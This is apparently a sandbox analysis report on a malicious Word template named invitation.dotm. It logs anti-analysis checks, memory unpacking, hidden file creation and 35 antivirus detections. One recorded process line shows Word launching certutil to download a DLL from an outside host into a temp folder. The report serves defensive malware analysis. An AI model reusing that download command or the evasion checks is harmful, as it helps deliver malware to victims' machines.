invitation.dotm

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 6, 2021, 2 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 6, 2021, 2 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Aug. 6, 2021, 2 p.m.	buffer: **** Online **** console_handle: 0x00000007	1	1	0
WriteConsoleW Aug. 6, 2021, 2 p.m.	buffer: CertUtil: -URLCache command FAILED: 0x80072efd (WIN32: 12029) console_handle: 0x00000007	1	1	0
WriteConsoleW Aug. 6, 2021, 2 p.m.	buffer: CertUtil: 서버에 연결할 수 없습니다. console_handle: 0x00000007	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 6, 2021, 2 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 6, 2021, 1:59 p.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Aug. 6, 2021, 2 p.m.	process_identifier: 1536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72472000 process_handle: 0xffffffff	1	0	0

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$vitation.dotm

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Aug. 6, 2021, 1:59 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000003ec filepath: C:\Users\test22\AppData\Local\Temp\~$vitation.dotm desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$vitation.dotm create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Word document hooks document open

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 6, 2021, 2 p.m.	flags: 15 family: 0		111	0

Creates suspicious VBA object (1 event)

com_class

Scripting.FileSystemObject

May attempt to write one or more files to the harddisk

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

certutil.exe -urlcache -split -f https://donattelli.com/test/ssi/1.dll C:\Users\test22\AppData\Local\Temp\radA044B.tmp.dll

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.MSWord.Caccf.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	VB.Heur.EmoooDldr.1.02CACCF2.Gen
McAfee	RDN/Generic Downloader.x
Sangfor	Malware.Generic-VBS.Save.481bf0ab
Alibaba	TrojanDownloader:VBA/MalDoc.ali1000101
Arcabit	VB.Heur.EmoooDldr.1.02CACCF2.Gen
Cyren	PP97M/Agent.QA.gen!Eldorado
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBA/Obfuscated.C
Avast	Script:SNH-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	VB.Heur.EmoooDldr.1.02CACCF2.Gen
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
Ad-Aware	VB.Heur.EmoooDldr.1.02CACCF2.Gen
TACHYON	Suspicious/WOX.Obfus.Gen.8
Emsisoft	VB.Heur.EmoooDldr.1.02CACCF2.Gen (B)
F-Secure	Heuristic.HEUR/Macro.Downloader.AMGY.Gen
TrendMicro	HEUR_VBA.O2
McAfee-GW-Edition	BehavesLike.Downloader.mc
FireEye	VB.Heur.EmoooDldr.1.02CACCF2.Gen
SentinelOne	Static AI - Malicious OPENXML
GData	VB.Heur.EmoooDldr.1.02CACCF2.Gen
Avira	HEUR/Macro.Downloader.AMGY.Gen
Microsoft	TrojanDownloader:O97M/Obfuse.SM!MTB
ViRobot	DOC.Z.Agent.28453
Cynet	Malicious (score: 99)
AhnLab-V3	Downloader/DOC.Agent
MAX	malware (ai score=100)
Zoner	Probably Heur.W97Obfuscated
Tencent	Heur.Macro.Generic.h.2d815c04
Ikarus	Trojan.VBA.Obfuscated
Fortinet	VBA/Agent.3FB2!tr.dldr
AVG	Script:SNH-gen [Trj]
Qihoo-360	virus.office.obfuscated.1